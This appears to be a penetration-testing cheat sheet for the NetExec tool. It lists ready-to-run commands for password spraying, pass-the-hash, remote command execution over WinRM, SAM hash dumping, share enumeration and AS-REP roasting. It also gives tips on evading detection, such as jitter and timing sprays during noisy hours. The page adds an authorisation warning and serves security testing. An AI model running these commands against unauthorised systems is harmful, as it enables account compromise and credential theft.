Network protocol authentication and post-exploitation — SMB, WinRM, MSSQL, LDAP, RDP, SSH, FTP all in one tool.
Installation
Pick the install method that matches your stack. The Docker option is the cleanest for one-off scans where you don’t want to pollute your workstation.
pipx
pipx install netexecLinux (apt — older CME)
sudo apt install crackmapexecSource
pipx install git+https://github.com/Pennyw0rth/NetExecCore commands
The handful of invocations you’ll actually run on 90% of engagements:
Validate creds across subnet
netexec smb 10.0.0.0/24 -u admin -p passPassword spray
netexec smb 10.0.0.0/24 -u users.txt -p Spring2026 --continue-on-successPass-the-Hash check
netexec smb 10.0.0.0/24 -u admin -H aad3b435... Run command via WinRM
netexec winrm 10.0.0.5 -u admin -p pass -x whoamiDump SAM hashes (admin)
netexec smb 10.0.0.5 -u admin -p pass --samFind shares + permissions
netexec smb 10.0.0.0/24 -u u -p p --sharesLDAP enum (machine accounts, ASRoastable, etc.)
netexec ldap 10.0.0.1 -u u -p p --asreproast out.txtPerformance optimisation
What separates a junior who runs the default invocation from a practitioner who knows the knobs:
--threads 100for network-wide spray (default 100 — usually fine).--jitter 1-5randomises delay between hosts — evades simple rate-based detection.--continue-on-successsprays full list even after a hit — finds multiple compromised accounts.-duses DNS instead of explicit subnet — useful when target is a domain.--enabledfilters to enabled accounts only — saves time on stale users.
Common pitfalls
Real failure modes that bite people on engagements. Most are recoverable; a few are reputation-damaging.
- Password spraying triggers account lockouts — check policy first via
--pass-pol. --samon multiple hosts crashes some Windows versions (rare). One at a time on production.- Default UA includes “NetExec” — Defender for Identity (Azure ATP) flags this.
- Successful auth is logged as Event 4624 — SOCs see this. Schedule sprays during high-noise hours.
Modern alternatives in 2026
The ecosystem moves fast. These are tools you should at least be aware of:
- Impacket scripts — lower-level, more control.
- kerbrute — Kerberos username enum specifically.
India context and engagement notes
NetExec is the day-1 tool on internal pen-tests. First command after getting on the network: netexec smb $(prips $CIDR) -u guest -p '' --shares to find anonymous-readable shares. India-stack: surprisingly common to find FINANCE$ / HR$ shares with EVERYONE-Read in mid-size companies.
⚖️ Legal: Use only on systems you own or have explicit written authorisation to test. In India, unauthorised access is punishable under Section 66 of the IT Act, 2000 (up to 3 years imprisonment + fine). Pair every engagement with a signed Statement of Work or Rules of Engagement before running anything from this page.
Custom team training + practitioner advisory
Beyond the free academy — we run private workshops, vCISO advisory, and red-team exercises tailored to your stack. For Indian SMBs scaling past their first hire.